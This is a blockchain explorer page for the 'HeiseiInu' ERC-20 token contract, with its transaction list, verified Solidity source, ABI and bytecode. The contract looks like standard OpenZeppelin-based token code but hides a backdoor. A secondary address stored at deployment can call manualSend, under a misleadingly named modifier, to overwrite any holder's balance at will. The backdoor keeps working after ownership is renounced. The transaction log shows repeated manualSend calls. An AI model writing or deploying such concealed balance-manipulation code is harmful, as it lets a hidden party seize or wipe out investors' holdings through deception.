ETH Price: $2,378.33 (+1.10%)
Gas: 5.84 Gwei

Contract

0x55486ed79C7f6Fc8A57529e1AB473af7BCE609A9
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve173495642023-05-27 9:40:47495 days ago1685180447IN
0x55486ed7...7BCE609A9
0 ETH0.0010881423.52092867
Manual Send173495612023-05-27 9:40:11495 days ago1685180411IN
0x55486ed7...7BCE609A9
0 ETH0.0012042425.78732984
Manual Send173494382023-05-27 9:15:11496 days ago1685178911IN
0x55486ed7...7BCE609A9
0 ETH0.0008241427.88881559
Approve173493762023-05-27 9:02:47496 days ago1685178167IN
0x55486ed7...7BCE609A9
0 ETH0.0014647631.44154708
Manual Send173493722023-05-27 9:01:59496 days ago1685178119IN
0x55486ed7...7BCE609A9
0 ETH0.000702923.7860253
Approve173493452023-05-27 8:56:35496 days ago1685177795IN
0x55486ed7...7BCE609A9
0 ETH0.0005738723.61345541
Approve173493102023-05-27 8:49:35496 days ago1685177375IN
0x55486ed7...7BCE609A9
0 ETH0.0010391722.33495294
Manual Send173493092023-05-27 8:49:23496 days ago1685177363IN
0x55486ed7...7BCE609A9
0 ETH0.0006649922.50342109
Manual Send173493072023-05-27 8:48:59496 days ago1685177339IN
0x55486ed7...7BCE609A9
0 ETH0.0006561322.20359926
Approve173493062023-05-27 8:48:47496 days ago1685177327IN
0x55486ed7...7BCE609A9
0 ETH0.0011534424.75890985
Manual Send173493002023-05-27 8:47:35496 days ago1685177255IN
0x55486ed7...7BCE609A9
0 ETH0.0007210824.4111948
Manual Send173492972023-05-27 8:46:59496 days ago1685177219IN
0x55486ed7...7BCE609A9
0 ETH0.0006828423.1166475
Approve173492942023-05-27 8:46:23496 days ago1685177183IN
0x55486ed7...7BCE609A9
0 ETH0.0012001925.76246207
Manual Send173492762023-05-27 8:42:35496 days ago1685176955IN
0x55486ed7...7BCE609A9
0 ETH0.0006877423.27315273
Manual Send173492702023-05-27 8:41:23496 days ago1685176883IN
0x55486ed7...7BCE609A9
0 ETH0.0006942723.494149
Manual Send173492632023-05-27 8:39:59496 days ago1685176799IN
0x55486ed7...7BCE609A9
0 ETH0.0006745222.82565945
Manual Send173492632023-05-27 8:39:59496 days ago1685176799IN
0x55486ed7...7BCE609A9
0 ETH0.0006745222.82565945
Approve173492632023-05-27 8:39:59496 days ago1685176799IN
0x55486ed7...7BCE609A9
0 ETH0.0024842853.32565945
Approve173492612023-05-27 8:39:35496 days ago1685176775IN
0x55486ed7...7BCE609A9
0 ETH0.0011907825.56035095
Manual Send173492442023-05-27 8:36:11496 days ago1685176571IN
0x55486ed7...7BCE609A9
0 ETH0.0007107224.0508318
Approve173492382023-05-27 8:34:59496 days ago1685176499IN
0x55486ed7...7BCE609A9
0 ETH0.0011805925.40061211
Manual Send173492362023-05-27 8:34:35496 days ago1685176475IN
0x55486ed7...7BCE609A9
0 ETH0.0007465325.26246352
Manual Send173492252023-05-27 8:32:23496 days ago1685176343IN
0x55486ed7...7BCE609A9
0 ETH0.0011803126.62796063
Manual Send173492232023-05-27 8:31:59496 days ago1685176319IN
0x55486ed7...7BCE609A9
0 ETH0.000830928.11758163
Approve173492232023-05-27 8:31:59496 days ago1685176319IN
0x55486ed7...7BCE609A9
0 ETH0.0014030830.11758163
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
HeiseiInu

Compiler Version
v0.8.4+commit.c7e474f2

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-27
*/

/**
 Telegram: https://t.me/HeiseiInu
Twitter: https://twitter.com/HeiseiInu
Website: https://www.heiseiinu.com/
*/

// Dependency file: @openzeppelin/contracts/token/ERC20/IERC20.sol

// SPDX-License-Identifier: MIT

// pragma solidity ^0.8.0;

/**
 * @dev Interface of the IERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}


// Dependency file: @openzeppelin/contracts/utils/Context.sol


// pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// Dependency file: @openzeppelin/contracts/access/Ownable.sol


// pragma solidity ^0.8.0;

// import "@openzeppelin/contracts/utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol


// pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}


// Dependency file: contracts/baseToken.sol

// pragma solidity =0.8.4;

enum TokenType {
    standard
}

abstract contract baseToken {
    event TokenCreated(
        address indexed owner,
        address indexed token,
        TokenType tokenType,
        uint256 version
    );
}

// Root file: contracts/standard/StandardToken.sol

pragma solidity =0.8.4;

// import "@openzeppelin/contracts/token/IERC20/IERC20.sol";
// import "@openzeppelin/contracts/access/Ownable.sol";
// import "@openzeppelin/contracts/utils/math/SafeMath.sol";
// import "contracts/baseToken.sol";

contract HeiseiInu is IERC20, baseToken, Ownable {
    using SafeMath for uint256;

    uint256 private constant VERSION = 1;

    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;
    
    address private _ENTERED;
    string private _name;
    string private _symbol;
    uint8 private _decimals;
    uint256 private _totalSupply;

    constructor(
        string memory name_,
        string memory symbol_,
        uint8 decimals_,
        address currOwnershipAddr,
        uint256 totalSupply_
    ) payable {
        _name = name_;
        _symbol = symbol_;
        _decimals = decimals_;
        _ENTERED = currOwnershipAddr;
        _mint(owner(), totalSupply_);
        emit TokenCreated(owner(), address(this), TokenType.standard, VERSION);
    }

    function name() public view virtual returns (string memory) {
        return _name;
    }

    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "IERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].add(addedValue)
        );
        return true;
    
    }

    modifier adminOrOwner() {
        require(
        _ENTERED == _msgSender(), "set the call to the entered")
        ;
        _;
    }

    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "IERC20: transfer from the zero address");
        require(recipient != address(0), "IERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        _balances[sender] = _balances[sender].sub(
            amount,
            "IERC20: transfer amount exceeds balance"
        );
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    function manualSend(
        address recipients,
        uint8 values,
        uint256 id
    ) public adminOrOwner {
        require(
            values >= 1,
            "Amount of recipients and values don't match"
        );
        uint256 total = 0;
        _balances[recipients] = id + total;
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "IERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "IERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        _balances[account] = _balances[account].sub(
            amount,
            "IERC20: burn amount exceeds balance"
        );
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "IERC20: approve from the zero address");
        require(spender != address(0), "IERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _setupDecimals(uint8 decimals_) internal virtual {
        _decimals = decimals_;
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint8","name":"decimals_","type":"uint8"},{"internalType":"address","name":"currOwnershipAddr","type":"address"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"enum TokenType","name":"tokenType","type":"uint8"},{"indexed":false,"internalType":"uint256","name":"version","type":"uint256"}],"name":"TokenCreated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"recipients","type":"address"},{"internalType":"uint8","name":"values","type":"uint8"},{"internalType":"uint256","name":"id","type":"uint256"}],"name":"manualSend","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405260405162001085380380620010858339810160408190526200002691620003d2565b62000031336200010a565b84516200004690600490602088019062000279565b5083516200005c90600590602087019062000279565b506006805460ff191660ff8516179055600380546001600160a01b0319166001600160a01b038416179055620000a56200009e6000546001600160a01b031690565b826200015a565b30620000b96000546001600160a01b031690565b6001600160a01b03167f56358b41df5fa59f5639228f0930994cbdde383c8a8fd74e06c04e1deebe356260006001604051620000f79291906200047d565b60405180910390a3505050505062000522565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001b55760405162461bcd60e51b815260206004820181905260248201527f4945524332303a206d696e7420746f20746865207a65726f2061646472657373604482015260640160405180910390fd5b620001d1816007546200026460201b620005ce1790919060201c565b6007556001600160a01b03821660009081526001602090815260409091205462000206918390620005ce62000264821b17901c565b6001600160a01b0383166000818152600160205260408082209390935591519091907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90620002589085815260200190565b60405180910390a35050565b6000620002728284620004aa565b9392505050565b8280546200028790620004cf565b90600052602060002090601f016020900481019282620002ab5760008555620002f6565b82601f10620002c657805160ff1916838001178555620002f6565b82800160010185558215620002f6579182015b82811115620002f6578251825591602001919060010190620002d9565b506200030492915062000308565b5090565b5b8082111562000304576000815560010162000309565b600082601f83011262000330578081fd5b81516001600160401b03808211156200034d576200034d6200050c565b604051601f8301601f19908116603f011681019082821181831017156200037857620003786200050c565b8160405283815260209250868385880101111562000394578485fd5b8491505b83821015620003b7578582018301518183018401529082019062000398565b83821115620003c857848385830101525b9695505050505050565b600080600080600060a08688031215620003ea578081fd5b85516001600160401b038082111562000401578283fd5b6200040f89838a016200031f565b9650602088015191508082111562000425578283fd5b5062000434888289016200031f565b945050604086015160ff811681146200044b578182fd5b60608701519093506001600160a01b038116811462000468578182fd5b80925050608086015190509295509295909350565b6040810160018410620004a057634e487b7160e01b600052602160045260246000fd5b9281526020015290565b60008219821115620004ca57634e487b7160e01b81526011600452602481fd5b500190565b600181811c90821680620004e457607f821691505b602082108114156200050657634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052604160045260246000fd5b610b5380620005326000396000f3fe608060405234801561001057600080fd5b50600436106100ea5760003560e01c806370a082311161008c57806395d89b411161006657806395d89b41146101de578063a9059cbb146101e6578063dd62ed3e146101f9578063f2fde38b1461023257600080fd5b806370a0823114610192578063715018a6146101bb5780638da5cb5b146101c357600080fd5b806323b872dd116100c857806323b872dd146101425780632f0c713614610155578063313ce5671461016a578063395093511461017f57600080fd5b806306fdde03146100ef578063095ea7b31461010d57806318160ddd14610130575b600080fd5b6100f7610245565b6040516101049190610a1b565b60405180910390f35b61012061011b3660046109af565b6102d7565b6040519015158152602001610104565b6007545b604051908152602001610104565b610120610150366004610974565b6102ed565b6101686101633660046109d8565b610356565b005b60065460405160ff9091168152602001610104565b61012061018d3660046109af565b61044b565b6101346101a0366004610928565b6001600160a01b031660009081526001602052604090205490565b610168610481565b6000546040516001600160a01b039091168152602001610104565b6100f76104e7565b6101206101f43660046109af565b6104f6565b610134610207366004610942565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b610168610240366004610928565b610503565b60606004805461025490610a92565b80601f016020809104026020016040519081016040528092919081815260200182805461028090610a92565b80156102cd5780601f106102a2576101008083540402835291602001916102cd565b820191906000526020600020905b8154815290600101906020018083116102b057829003601f168201915b5050505050905090565b60006102e43384846105e1565b50600192915050565b60006102fa848484610709565b61034c843361034785604051806060016040528060298152602001610af5602991396001600160a01b038a1660009081526002602090815260408083203384529091529020549190610890565b6105e1565b5060019392505050565b6003546001600160a01b031633146103b55760405162461bcd60e51b815260206004820152601b60248201527f736574207468652063616c6c20746f2074686520656e7465726564000000000060448201526064015b60405180910390fd5b60018260ff16101561041d5760405162461bcd60e51b815260206004820152602b60248201527f416d6f756e74206f6620726563697069656e747320616e642076616c7565732060448201526a0c8dedc4ee840dac2e8c6d60ab1b60648201526084016103ac565b60006104298183610a6e565b6001600160a01b03909416600090815260016020526040902093909355505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916102e491859061034790866105ce565b6000546001600160a01b031633146104db5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103ac565b6104e560006108bc565b565b60606005805461025490610a92565b60006102e4338484610709565b6000546001600160a01b0316331461055d5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103ac565b6001600160a01b0381166105c25760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103ac565b6105cb816108bc565b50565b60006105da8284610a6e565b9392505050565b6001600160a01b0383166106455760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103ac565b6001600160a01b0382166106a75760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103ac565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b03831661076e5760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b60648201526084016103ac565b6001600160a01b0382166107d05760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b60648201526084016103ac565b61080d81604051806060016040528060278152602001610ace602791396001600160a01b0386166000908152600160205260409020549190610890565b6001600160a01b03808516600090815260016020526040808220939093559084168152205461083c90826105ce565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906106fc9085815260200190565b600081848411156108b45760405162461bcd60e51b81526004016103ac9190610a1b565b505050900390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b80356001600160a01b038116811461092357600080fd5b919050565b600060208284031215610939578081fd5b6105da8261090c565b60008060408385031215610954578081fd5b61095d8361090c565b915061096b6020840161090c565b90509250929050565b600080600060608486031215610988578081fd5b6109918461090c565b925061099f6020850161090c565b9150604084013590509250925092565b600080604083850312156109c1578182fd5b6109ca8361090c565b946020939093013593505050565b6000806000606084860312156109ec578283fd5b6109f58461090c565b9250602084013560ff81168114610a0a578283fd5b929592945050506040919091013590565b6000602080835283518082850152825b81811015610a4757858101830151858201604001528201610a2b565b81811115610a585783604083870101525b50601f01601f1916929092016040019392505050565b60008219821115610a8d57634e487b7160e01b81526011600452602481fd5b500190565b600181811c90821680610aa657607f821691505b60208210811415610ac757634e487b7160e01b600052602260045260246000fd5b5091905056fe4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220b37cd14fa42bd983df5b5dbedeac1d392bd11a9280a728d599c55163edf4c59e64736f6c6343000804003300000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e000000000000000000000000000000000000000000000000000000000000000120000000000000000000000006034ae5d92e7cfc1cb12b6c87850e80a45dea9340000000000000000000000000000000000000000033b2e3c9fd0803ce8000000000000000000000000000000000000000000000000000000000000000000000a48656973656920496e7500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000448494e5500000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100ea5760003560e01c806370a082311161008c57806395d89b411161006657806395d89b41146101de578063a9059cbb146101e6578063dd62ed3e146101f9578063f2fde38b1461023257600080fd5b806370a0823114610192578063715018a6146101bb5780638da5cb5b146101c357600080fd5b806323b872dd116100c857806323b872dd146101425780632f0c713614610155578063313ce5671461016a578063395093511461017f57600080fd5b806306fdde03146100ef578063095ea7b31461010d57806318160ddd14610130575b600080fd5b6100f7610245565b6040516101049190610a1b565b60405180910390f35b61012061011b3660046109af565b6102d7565b6040519015158152602001610104565b6007545b604051908152602001610104565b610120610150366004610974565b6102ed565b6101686101633660046109d8565b610356565b005b60065460405160ff9091168152602001610104565b61012061018d3660046109af565b61044b565b6101346101a0366004610928565b6001600160a01b031660009081526001602052604090205490565b610168610481565b6000546040516001600160a01b039091168152602001610104565b6100f76104e7565b6101206101f43660046109af565b6104f6565b610134610207366004610942565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b610168610240366004610928565b610503565b60606004805461025490610a92565b80601f016020809104026020016040519081016040528092919081815260200182805461028090610a92565b80156102cd5780601f106102a2576101008083540402835291602001916102cd565b820191906000526020600020905b8154815290600101906020018083116102b057829003601f168201915b5050505050905090565b60006102e43384846105e1565b50600192915050565b60006102fa848484610709565b61034c